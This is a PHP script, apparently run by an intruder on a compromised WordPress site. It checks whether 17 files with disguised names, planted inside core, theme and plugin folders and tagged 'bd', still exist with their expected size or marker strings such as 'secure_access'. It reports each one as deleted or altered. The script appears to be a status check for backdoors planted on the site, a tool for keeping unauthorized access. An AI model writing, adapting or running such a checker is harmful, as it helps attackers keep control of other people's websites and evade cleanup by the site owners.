<?php $r = '/home/akasyxse/krivzee.com'; $x = ["/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/patErrorManager.php"=>"bd@@30409736@@2014",
"/wp-content/plugins/extendify/app/Shared/Services/Import/messages.php"=>"bd@@82551337@@1578",
"/wp-content/plugins/current-date/elementor-addons/cdsfw-current-date-register-widget.php"=>"bd@@57464114@@request_approved",
"/wp-content/themes/twentytwentyfive/patterns/header-centered.php"=>"bd@@67106119@@secure_access",
"/wp-content/plugins/extendify/app/Shared/Services/PluginDependencies/Forms/importus.php"=>"bd@@82543688@@1806",
"/wp-content/plugins/starbox/vendor/meta-box/support/add_new_case.php"=>"bd@@70763346@@654",
"/wp-includes/html-api/html5-named-character-references.php"=>"bd@@82555992@@approve_request",
"/wp-content/plugins/athemes-starter-sites/inc/fields/input.php"=>"bd@@70664545@@3756",
"/wp-content/plugins/themegrill-demo-importer/inc/fields/number.php"=>"bd@@78611874@@system_core",
"/wp-content/plugins/extendify/app/Draft/Controllers/screen_04.php"=>"bd@@67106225@@1556",
"/wp-content/plugins/wp-file-manager/lib/php/plugins/Normalizer/java5.php"=>"bd@@30421174@@630",
"/wp-content/plugins/extendify/app/Shared/Services/topic_review.php"=>"bd@@78608311@@706",
"/wp-includes/customize/class-wp-customize-nav-menu-section.php"=>"bd@@78604016@@dataflow_engine",
"/wp-content/plugins/extendify/app/Shared/DataProvider/dividers.php"=>"bd@@66381298@@709",
"/wp-content/plugins/wp-file-manager/lib/php/libs/dbtable.php"=>"bd@@67140090@@1904",
"/wp-includes/sodium_compat/src/Core/AEGIS128L.php"=>"bd@@30409680@@framework",
"/wp-content/plugins/wp-file-manager/lib/php/plugins/AutoResize/Common.php"=>"bd@@30409725@@3145"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!'); |